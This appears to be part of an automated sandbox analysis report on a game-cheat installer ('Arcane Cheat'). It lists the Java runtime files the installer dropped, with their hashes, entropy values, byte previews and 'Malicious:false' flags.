                                Preview:...TZDB....2016d.S..Africa/Abidjan..Africa/Accra..Africa/Addis_Ababa..Africa/Algiers..Africa/Asmara..Africa/Asmera..Africa/Bamako..Africa/Bangui..Africa/Banjul..Africa/Bissau..Africa/Blantyre..Africa/Brazzaville..Africa/Bujumbura..Africa/Cairo..Africa/Casablanca..Africa/Ceuta..Africa/Conakry..Africa/Dakar..Africa/Dar_es_Salaam..Africa/Djibouti..Africa/Douala..Africa/El_Aaiun..Africa/Freetown..Africa/Gaborone..Africa/Harare..Africa/Johannesburg..Africa/Juba..Africa/Kampala..Africa/Khartoum..Africa/Kigali..Africa/Kinshasa..Africa/Lagos..Africa/Libreville..Africa/Lome..Africa/Luanda..Africa/Lubumbashi..Africa/Lusaka..Africa/Malabo..Africa/Maputo..Africa/Maseru..Africa/Mbabane..Africa/Mogadishu..Africa/Monrovia..Africa/Nairobi..Africa/Ndjamena..Africa/Niamey..Africa/Nouakchott..Africa/Ouagadougou..Africa/Porto-Novo..Africa/Sao_Tome..Africa/Timbuktu..Africa/Tripoli..Africa/Tunis..Africa/Windhoek..America/Adak..America/Anchorage..America/Anguilla..America/Antigua..America/Araguaina..America/

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-MSBPS.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:data
                                Category:dropped
                                Size (bytes):4122
                                Entropy (8bit):3.2585384283455134
                                Encrypted:false
                                SSDEEP:48:BlWxFFGFSupi94blATFxjGph5vLC6/w37ZXQTbVm/eVzOBJ:BlWJEi94blAT+ph5vLkApmGqr
                                MD5:F6258230B51220609A60AA6BA70D68F3
                                SHA1:B5B95DD1DDCD3A433DB14976E3B7F92664043536
                                SHA-256:22458853DA2415F7775652A7F57BB6665F83A9AE9FB8BD3CF05E29AAC24C8441
                                SHA-512:B2DFCFDEBF9596F2BB05F021A24335F1EB2A094DCA02B2D7DD1B7C871D5EECDA7D50DA7943B9F85EDB5E92D9BE6B6ADFD24673CE816DF3960E4D68C7F894563F
                                Malicious:false
                                Preview:CurD..........................@C..,M...................... K...C..PF..4@...........R...........C......TF...........M..DL...C.......S..........<M...c...................C...C...A..........hK...C...M.......... O......8...PC...C..........@E...............E..............`.......pX...O...........B...C.......O...D..............,J..........................................@J..............XO..........................................0C...........................O...........................................M.......A...............................................................C...O...................................................................O..........TK...........R...O..............8C...........................P.................. C..............................................`C..........PK...............J......0F..pE...................................Q...............................R.......Q...........c...Q...................................................................................C

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-N36F6.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3144
                                Entropy (8bit):4.858724831876285
                                Encrypted:false
                                SSDEEP:48:VBnTRxiW1nTbXMROXX6zcjd6vEzcoZDTzcj8L0zccfbb6wB:VBnvisPMQ6z+zPVzv0zVfvT
                                MD5:1CBB261944925044B1EE119DC0563D05
                                SHA1:05F2F63047F4D82F37DFA59153309E53CAA4675C
                                SHA-256:5BAF75BDD504B2C80FF5B98F929A16B04E9CB06AA8AAE30C144B5B40FEBE0906
                                SHA-512:C964A92BE25BACF11D20B61365930CAB28517D164D9AE4997651E2B715AA65628E45FA4BD236CCD507C65E5D85A470FD165F207F446186D22AE4BD46A04006E6
                                Malicious:false
                                Preview:############################################################..# .Default Networking Configuration File..#..# This file may contain default values for the networking system properties...# These values are only used when the system properties are not specified..# on the command line or set programatically...# For now, only the various proxy settings can be configured here...############################################################....# Whether or not the DefaultProxySelector will default to System Proxy..# settings when they do exist...# Set it to 'true' to enable this feature and check for platform..# specific proxy settings..# Note that the system properties that do explicitely set proxies..# (like http.proxyHost) do take precedence over the system settings..# even if java.net.useSystemProxies is set to true... ..java.net.useSystemProxies=false....#------------------------------------------------------------------------..# Proxy configuration for the various protocol handlers...# D

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-NCN18.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2915
                                Entropy (8bit):5.2172692442941075
                                Encrypted:false
                                SSDEEP:48:GgQv18IsTJvuUdEt6u7KeblbhGwQEvzZIE+i+WEi+Iq4fNSg2kv:Gb6Xha1hFGwQEvdh+5g2kv
                                MD5:A38587427E422D55B012FA3E5C9436D2
                                SHA1:7BD1B81B39DA78124BE045507E0681E860921DBB
                                SHA-256:D2C47DE948033ED836B375CCD518CF55333FE11C4CED56BC1CE2FF62114CF546
                                SHA-512:EA6CA975E9308ED2B3BBCCE91EE61142DAB0067CE8F17CB469929F6136E6B4A968BAC838141D8B38866F9EF5E15E156400859CCCC84FB114214E19556F0DC636
                                Malicious:false
                                Preview:#..#..# Copyright (c) 1996, 2000, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.Japanese PostScript printer property file..#..font.num=16..#..serif=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..monospaced=monospaced..courier=monospaced..dialog=sansserif..dialoginput=monospaced..#..serif.latin1.plain=Times-Roman..serif.latin1.italic=Times-Italic..serif.latin1.bolditalic=Times-BoldItalic..serif.latin1.bold=Times-Bold..#..sansserif.latin1.plain=Helvetica..sansserif.latin1.italic=Helvetica-Oblique..sansserif.latin1.bolditalic=Helvetica-BoldOblique..sansserif.latin1.bold=Helvetica-Bold..#..monospaced.latin1.plain=Courier..monospaced.latin1.italic=Courier-Oblique..monospaced.latin1.bolditalic=Courier-BoldOblique..monospaced.latin1.bold=Courier-Bold..#..serif.x11jis0208.plain=Ryumin-Light-H..serif.x11jis0208.italic=Ryumin-Light-H

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-RNH73.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:raw G3 (Group 3) FAX
                                Category:dropped
                                Size (bytes):3670
                                Entropy (8bit):4.40570512634857
                                Encrypted:false
                                SSDEEP:96:IRsY7hGbXWvaBKvKY5csW4BxciETBT5Bxrws+LW/B56JF:At/vaBKvKY5fxci8jMWY
                                MD5:E0E5428560288E685DBFFC0D2776D4A6
                                SHA1:2AE70624762C163C8A1533F724AA5A511D8B208E
                                SHA-256:AAE23ACC42F217A63D675F930D077939765B97E9C528B5659842515CA975111F
                                SHA-512:C726CC2898399579AFA70ACACE86BEC4369D4541112243E51721568B4D25DCC6C66FA64AC475AFF9BA9DE07A630B24A9F221FA00426AD36845203BA809219E3C
                                Malicious:false
                                Preview:...%.........6.Y.j.{.........+...........6.=.:.-.9.;.<.3...0.4./.2.8.1.5.7......................................................................................................................................... ............... .........................................................................................................................D.C.I.F.A.G.E.B.?.@.>.H...........................................................................................!.".#.$.%.&.'.(.).*.+.+.+.+.+.J.M.U.^.f.e.X.W.d.V.R.\._.`.a.Y.O.Z.P.S.K.Q.N.[.c.L.T.].b.g.j.}...r.q.l.{.z.....p.o.|.s.k.w.~.t.x.v.y.........h.u.i.m.........n.................................................................................................................................................!......."........... .................#.(.-.2.7.<.A.F.K.P.U.[.a.g.m.s.y......................................................... .(.5.;.H.U.d.v...............................*.4.?.H.T.].i.s.~.............................".7.@.J.R.R.^.i

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-SDO4P.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):14331
                                Entropy (8bit):3.512673497574481
                                Encrypted:false
                                SSDEEP:96:W6Zh/3dzz8XIrN2r1CdaqRWtHwBWgvw0Jy/ArUsJzu0HI:W6jhGIwxCdaqWQBWgvw0JyorBJzu0o
                                MD5:6E378235FB49F30C9580686BA8A787AA
                                SHA1:2FC76D9D615A35244133FC01AB7381BA49B0B149
                                SHA-256:B4A0C0A98624C48A801D8EA071EC4A3D582826AC9637478814591BC6EA259D4A
                                SHA-512:58558A1F8D9D3D6F0E21B1269313FD6AC9A80A93CC093A5E8CDEC495855FCD2FC95A6B54FE59E714E89D9274654BB9C1CD887B3FB9D4B9D9C50E5C5983C571B8
                                Malicious:false
                                Preview:# Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# This properties file defines a Hijrah calendar variant...#..# Fields:..#..# <version> ::= 'version' '=' <version string>..# <id> ::= 'id' '=' <id string>..# <type> ::= 'type' '=' <type string>..# <iso-start> ::= 'iso-start' '=' <start date in the ISO calendar>..# <year> ::= <yyyy> '=' <nn nn nn nn nn nn nn nn nn nn nn nn>..#..# version ... (Required)..#..# id ... (Required)..# Identifies the Java Chronology..#..# type ... (Required)..# Identifies the type of calendar in the standard calendar ID scheme..# iso-start ... (Required)..# Specifies the corresponding ISO date to the first Hijrah day..# in the defined range of dates..#..# year ... (Required)..# Number of days for each month of a Hijrah year..# * Each line defines a ye

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-TUEUN.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):381
                                Entropy (8bit):4.99308306420453
                                Encrypted:false
                                SSDEEP:6:5ji0B4r/Rjiszbdy/oocj+sqX2K5YZ5/CUMQxxi6m4xijgxmzbdGh/4:5ji0GJjiIq1cCvXPA/CUMQxoeocx2K/4
                                MD5:B608D45DCDD7A4CAD6A63A89A002F683
                                SHA1:F6E3BB7050C3B1A3BED9B33122C4A98E6B9A810D
                                SHA-256:52CA96531445B437DCA524CB3714FCD8D70221D37A6B9C80F816713C3040DD0A
                                SHA-512:407E7CA807826F0E41B085BCA0F54F0134E3B9AC16FA5480EDE02774067DAD46AA07D225BA2981DEC2A7297EA57721EAB8C54E8BED83D352EC6C00ABFDBBF626
                                Malicious:false
                                Preview:PK........t..H................META-INF/......PK..............PK........t..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r9....:.$..[).....&.%....E..r.\.E....y...r..PK.....k.......PK..........t..H..............................META-INF/....PK..........t..H...k.....................=...META-INF/MANIFEST.MFPK..........}.........

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-V21KH.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4005
                                Entropy (8bit):4.909684349537555
                                Encrypted:false
                                SSDEEP:96:5Th0S7zmtRUioj/DUXBZZjM8mcWoe+YfVktH:5h0Iz6Uioj/YXLZjnmdoeDktH
                                MD5:B0CE9F297D3FEC6325C0C784072908F1
                                SHA1:DD778A0E5417B9B97187215FFC66D4C14F95FEF0
                                SHA-256:6DA00C1CBE02909DCD6A75DA51D25DBF49BFD1D779C0B8E57B12E757229FC4A8
                                SHA-512:4C774BCB9ADE996569C86DD46B3BDB046771AD1BCF9AABB9DB86854C83E18015CBE5DF73DA86EE98E26BA0393F548B1CC09DE60BDA4248EACC4FC833E23B8AB4
                                Malicious:false
                                Preview:#..# This properties file is used to initialize the default..# java.awt.datatransfer.SystemFlavorMap. It contains the Win32 platform-..# specific, default mappings between common Win32 Clipboard atoms and platform-..# independent MIME type strings, which will be converted into..# java.awt.datatransfer.DataFlavors...#..# These default mappings may be augmented by specifying the..#..# AWT.DnD.flavorMapFileURL ..#..# property in the appropriate awt.properties file. The specified properties URL..# will be loaded into the SystemFlavorMap...#..# The standard format is:..#..# <native>=<MIME type>..#..# <native> should be a string identifier that the native platform will..# recognize as a valid data format. <MIME type> should specify both a MIME..# primary type and a MIME subtype separated by a '/'. The MIME type may include..# parameters, where each parameter is a key/value pair separated by '=', and..# where each parameter to the MIME type is separated by a ';'...#..# Because SystemFla

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-V8NE5.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):10779
                                Entropy (8bit):5.217016051711063
                                Encrypted:false
                                SSDEEP:192:Pj2TlKg7RzPc/mOHUFN5HX/rS8QbWZjjfVpMbtxp8lcR9NN:Pj6Y8NcFzXbWZjj9pSMlcz
                                MD5:0C1DB7410938A3634BD9928BA2F284CB
                                SHA1:7EE31F22136E73A2A3D0AAB279199778BAAB06F5
                                SHA-256:818A718788E5506EBB84F26DE82B6C60E08861876400E9ED3931346174D5D7FB
                                SHA-512:EE267E59564A077713856A307382D40D0D8DF8E7EC2EF930723B076F5E38446D3B2600D10AC192262F9A3A86D9973CF13A9E90D180818C05A6C7896A5BD7AD19
                                Malicious:false
                                Preview:#..# ..# Copyright (c) 2003, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....# Version....version=1....# Component Font Mappings....allfonts.chinese-ms936=SimSun..allfonts.chinese-ms936-extb=SimSun-ExtB..allfonts.chinese-gb18030=SimSun-18030..allfonts.chinese-gb18030-extb=SimSun-ExtB..allfonts.chinese-hkscs=MingLiU_HKSCS..allfonts.chinese-ms950-extb=MingLiU-ExtB..allfonts.devanagari=Mangal..allfonts.dingbats=Wingdings..allfonts.lucida=Lucida Sans Regular..allfonts.symbol=Symbol..allfonts.thai=Lucida Sans Regular..allfonts.georgian=Sylfaen....serif.plain.alphabetic=Times New Roman..serif.plain.chinese-ms950=MingLiU..serif.plain.chinese-ms950-extb=MingLiU-ExtB..serif.plain.hebrew=David..serif.plain.japanese=MS Mincho..serif.plain.korean=Batang....serif.bold.alphabetic=Times New Roman Bold..serif.bold.chinese-ms950=PMingLiU..serif.bold.chinese-ms9

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\javafx.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):58
                                Entropy (8bit):4.4779965120705425
                                Encrypted:false
                                SSDEEP:3:CEBqRM9LTAGQdLV6ETEBqRM9LHQIuHPy:CEAsnAbLlszQdy
                                MD5:3C2B9CCAAD3D986E5874E8C0F82C37CF
                                SHA1:D1DDA4A2D5D37249C8878437DBF36C6AE61C33D1
                                SHA-256:D5BCD7D43E383D33B904CFF6C80ACE359DBE2CE2796E51E9743358BD650E4198
                                SHA-512:4350CCA847D214479C6AE430EB71EE98A220EA10EC175D0AB317A8B43ABC9B4054E41D0FF383F26D593DE825F761FB93704E37292831900F31E5E38167A41BAB
                                Malicious:false
                                Preview:javafx.runtime.version=8.0.101..javafx.runtime.build=b13..

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\javaws.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):476286
                                Entropy (8bit):7.905283162751186
                                Encrypted:false
                                SSDEEP:12288:k4VtaECp5plmgYhuWvHuR9Ta/+Aw7okxygk+W:kUChlHYHMaHw7XxW
                                MD5:5D8C1723F3005BD63DBA2B478CE15621
                                SHA1:AB26A6167789DCF81A0C40D121DC91005804C703
                                SHA-256:B637B78CFC33C92D4838D5FABFD0647CE03C3EF69D86EF6A7E6F229510AAF3B5
                                SHA-512:9830CCDFE913A492BB4E0015EE3E729BEA8EC1F22EDF48ED7CE2AEFD5376DF24F33948B9155E31EDFA9BC240544406FD2C43A34DD1366E4936B3318D3CA5ED1C
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/sun/PK...........H................com/sun/javaws/PK...........H................com/sun/javaws/exceptions/PK...........H................com/sun/javaws/jnl/PK...........H................com/sun/javaws/net/PK...........H................com/sun/javaws/net/protocol/PK...........H............ ...com/sun/javaws/net/protocol/jar/PK...........H................com/sun/javaws/progress/PK...........H................com/sun/javaws/security/PK...........H................com/sun/javaws/ui/PK...........H................com/sun/javaws/util/PK...........H................com/sun/jnlp/PK...........H................javax/PK...........H................javax/jnlp/PK...........H~p4=........#...com/sun/javaws/BrowserSupport.class.RMO.1.}...].H @.|.|(...P..B.....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\jce.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):114950
                                Entropy (8bit):7.912507028584016
                                Encrypted:false
                                SSDEEP:1536:5sNJO+ylt6se6sgU0w/XzGYWuSy15DudYLSfaxwpt5g1naZEqwoJ8sYcF+z/VSG8:aj8GHXZSy1pudYLdQe1ATtKVS+ws9O
                                MD5:A39F61D6ED2585519D7AF1E2EA029F59
                                SHA1:52515AC6DEAB634F3495FD724DEA643EE442B8FD
                                SHA-256:60724D9E372FBE42759349A06D3426380CA2B9162FA01EB2C3587A58A34AD7E0
                                SHA-512:AC2E9AB749F5365BE0FB8EBD321E8F231D22EAE396053745F047FCBCCF8D3DE2F737D3C37A52C715ADDFBDBD18F14809E8B37B382B018B58A76E063EFBA96948
                                Malicious:false
                                Preview:PK........gwHG................META-INF/MANIFEST.MF.Y....Y.C,j.m.,....z..I &1.m....b........D..+.$t......]....h.o......x...~..?..<@....7#n3.......m../\..u..>.....#......~.K..A..x ..../J...xa..,.._...G...?^...{...>.uj.AQ?^h....c_.pc..W....c.A..`....-.~ak.....^.&.......l.......X.kG.~yg..f......Z..b..L|......4....`..}........mG.o.....kU..*;W.HCU....e.....V..,...1Y.z<.n.A.j.....P..S.($,z........uD".9;..q...k.:p3pW......O...(....\.B...2...#.,.;w.q..k0r.el\F.^.!p..$.....}.9..lhf.P..:.E.&Lf..5.7....W.A.....[7.N}..+.J!.9.Gl.... ...rL.B}.Q.,.'.....@...W.ry[Ok&.......o...dp%..2.\.[2.........fB.p..Xd._.lA....xw..`.r..8...o.....ad}-..;...6....e...F.&e\....'...fA.Db.......%.@..^..U...*..q<.Z.K.T...."r.b...7@8.)4..~.4b....Y.q..u..N..|...e.#.I....4c{.....g.R....]......F.fo.F.u.).F.Z]..(.c|s....u.i..8..=..N%....]...)Xj\..t..w..ql..n.....2..u...|x$7YL.M.?..]..W...m^].~...{....I..{......[-..].f....Sc..c..6..kN.>....7x.k..a7S......8..e.w....*......&.;.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\jfr.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):560553
                                Entropy (8bit):5.781566946934384
                                Encrypted:false
                                SSDEEP:12288:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f/m5NwaHkSIJHvWQ6Q7ooMcgH5lY7TQ5cD:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f3
                                MD5:CCB395235C35C3ACBA592B21138CC6AB
                                SHA1:29C463AA4780F13E77FB08CC151F68CA2B2958D5
                                SHA-256:27AD8EA5192EE2D91BA7A0EACE9843CB19F5E145259466158C2F48C971EB7B8F
                                SHA-512:D4C330741387F62DD6E52B41167CB11ABD8615675FE7E1C14AE05A52F87A348CBC64B56866AE313B2906B33CE98BE73681F769A4A54F6FE9A7D056F88CF9A4E1
                                Malicious:false
                                Preview:PK........t..H................META-INF/....PK........t..H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........HB.<>^...^...8...com/oracle/jrockit/jfr/client/EventSettingsBuilder.class.......4....5.f..g....f..4.h..4.i..j....f..4.k..l....m..4.n..o....f..4.p..q..r....f....s....t....u....v..w..x..y....z..{....|....}....~.................................#.........................)...................................................eventDefaultSets...Ljava/util/ArrayList;...Signature..DLjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventDefaultSet;>;...settings..ALjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventSetting;>;...eventDescriptorType..2Loracle/jrockit/jfr/openmbean/

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\jfr\default.jfc (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):20670
                                Entropy (8bit):4.627043889535612
                                Encrypted:false
                                SSDEEP:192:VOMjUVCEM0Ut0ZINFWbqsZSwOVzx8xyxxxbAJ1muS7khPdyPsXZd2ZhptEgReW82:VONVTVgF9SsTMLA
                                MD5:47495DA4E7B3AF33F5C3ED1E35AC25AE
                                SHA1:F6DE88A4C6AE0C14B9F875FB4BC4721A104CB0EE
                                SHA-256:37D19EAC73DEEB613FBB539AE7E7C99339939EB3EFEC44E9EB45F68426E9F159
                                SHA-512:74DBEB118575B8881D5B43270EF878162DBDC222AC6D20F04699B2B733427347ABC76D6E82BF7728FCC435129B114E4C75D011FC5DDDEAF5A59E137BBC81F2B9
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8"?>.... .. Recommended way to edit .jfc files is to use Java Mission Control,.. see Window -> Flight Recorder Template Manager...-->....<configuration version="1.0" name="Continuous" description="Low overhead configuration safe for continuous use in production environments, typically less than 1 % overhead." provider="Oracle">.... <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.... <control>.... .. Contents of the control element is not read by the JVM, it's used.. by Java Mission Control to change settings that carry the control attribute... -->.... <selection name="gc-level" default="detailed" label="Garbage Collector">.. <option label="Off" name="off">off</option>.. <option label="Normal" name="detailed">normal</option>.. <option label="All" name="all">all</option>.. </selection>.... <condition name="gc-enabled-normal" true="true" false="fals

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\jfr\is-67R0L.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):20626
                                Entropy (8bit):4.626761353117893
                                Encrypted:false
                                SSDEEP:192:VeMjUECOwMsUt0ZINFWbqeZSwOVza8ayaxabAJ1duSikhPdyPsXZd2ZhptEgReWL:VeNEg/gF/ZnixLy
                                MD5:5480BEF2CA99090857E5CBF225C12A78
                                SHA1:E1F73CA807EC14941656FBE3DB6E5E5D9032041D
                                SHA-256:5FB0982C99D6BF258335FB43AAAE91919804C573DFD87B51E05C54ADB3C0392B
                                SHA-512:65FE0D6DA17E62CF29875910EB84D57BC5BB667C753369B4F810028C0995E63C322FAD2EB99658B6C19E11E8D2A40CB11B3C09943EB9C0B88F45626579ECE058
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8"?>.... .. Recommended way to edit .jfc files is to use Java Mission Control,.. see Window -> Flight Recorder Template Manager...-->....<configuration version="1.0" name="Profiling" description="Low overhead configuration for profiling, typically around 2 % overhead." provider="Oracle">.... <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.... <control>.... .. Contents of the control element is not read by the JVM, it's used.. by Java Mission Control to change settings that carry the control attribute... -->.... <selection name="gc-level" default="detailed" label="Garbage Collector">.. <option label="Off" name="off">off</option>.. <option label="Normal" name="detailed">normal</option>.. <option label="All" name="all">all</option>.. </selection>.... <condition name="gc-enabled-normal" true="true" false="false">.. <or>.. <test name="

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\jfr\is-E3OJR.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):20670
                                Entropy (8bit):4.627043889535612
                                Encrypted:false
                                SSDEEP:192:VOMjUVCEM0Ut0ZINFWbqsZSwOVzx8xyxxxbAJ1muS7khPdyPsXZd2ZhptEgReW82:VONVTVgF9SsTMLA
                                MD5:47495DA4E7B3AF33F5C3ED1E35AC25AE
                                SHA1:F6DE88A4C6AE0C14B9F875FB4BC4721A104CB0EE
                                SHA-256:37D19EAC73DEEB613FBB539AE7E7C99339939EB3EFEC44E9EB45F68426E9F159
                                SHA-512:74DBEB118575B8881D5B43270EF878162DBDC222AC6D20F04699B2B733427347ABC76D6E82BF7728FCC435129B114E4C75D011FC5DDDEAF5A59E137BBC81F2B9
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8"?>.... .. Recommended way to edit .jfc files is to use Java Mission Control,.. see Window -> Flight Recorder Template Manager...-->....<configuration version="1.0" name="Continuous" description="Low overhead configuration safe for continuous use in production environments, typically less than 1 % overhead." provider="Oracle">.... <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.... <control>.... .. Contents of the control element is not read by the JVM, it's used.. by Java Mission Control to change settings that carry the control attribute... -->.... <selection name="gc-level" default="detailed" label="Garbage Collector">.. <option label="Off" name="off">off</option>.. <option label="Normal" name="detailed">normal</option>.. <option label="All" name="all">all</option>.. </selection>.... <condition name="gc-enabled-normal" true="true" false="fals

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\jfr\profile.jfc (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):20626
                                Entropy (8bit):4.626761353117893
                                Encrypted:false
                                SSDEEP:192:VeMjUECOwMsUt0ZINFWbqeZSwOVza8ayaxabAJ1duSikhPdyPsXZd2ZhptEgReWL:VeNEg/gF/ZnixLy
                                MD5:5480BEF2CA99090857E5CBF225C12A78
                                SHA1:E1F73CA807EC14941656FBE3DB6E5E5D9032041D
                                SHA-256:5FB0982C99D6BF258335FB43AAAE91919804C573DFD87B51E05C54ADB3C0392B
                                SHA-512:65FE0D6DA17E62CF29875910EB84D57BC5BB667C753369B4F810028C0995E63C322FAD2EB99658B6C19E11E8D2A40CB11B3C09943EB9C0B88F45626579ECE058
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8"?>.... .. Recommended way to edit .jfc files is to use Java Mission Control,.. see Window -> Flight Recorder Template Manager...-->....<configuration version="1.0" name="Profiling" description="Low overhead configuration for profiling, typically around 2 % overhead." provider="Oracle">.... <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.... <control>.... .. Contents of the control element is not read by the JVM, it's used.. by Java Mission Control to change settings that carry the control attribute... -->.... <selection name="gc-level" default="detailed" label="Garbage Collector">.. <option label="Off" name="off">off</option>.. <option label="Normal" name="detailed">normal</option>.. <option label="All" name="all">all</option>.. </selection>.... <condition name="gc-enabled-normal" true="true" false="false">.. <or>.. <test name="

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\jfxswt.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):33932
                                Entropy (8bit):7.930702746433849
                                Encrypted:false
                                SSDEEP:768:xYJfTGikW6VajSe/SA5vN9kqizE48ojVxQYuW+t:xY5TpkK/nFNIzptjVxYHt
                                MD5:C401E00A5DE0DD9723885CEF9E2F5A44
                                SHA1:B6735B93811517F062A20869D8A0B57FAEFF6A90
                                SHA-256:C6574F4763696F2A83028DE143D9ED1C975062BA2D44CC5C91558751FB84BCD6
                                SHA-512:595B950AD5BFF930654BF7FB996BA222D19B4F175821AB0FD6EC4F54D4B7D62B37757429051D1302BC438AB76350B4CD0A07BA712CAECC79DCDB0C60494B5AB2
                                Malicious:false
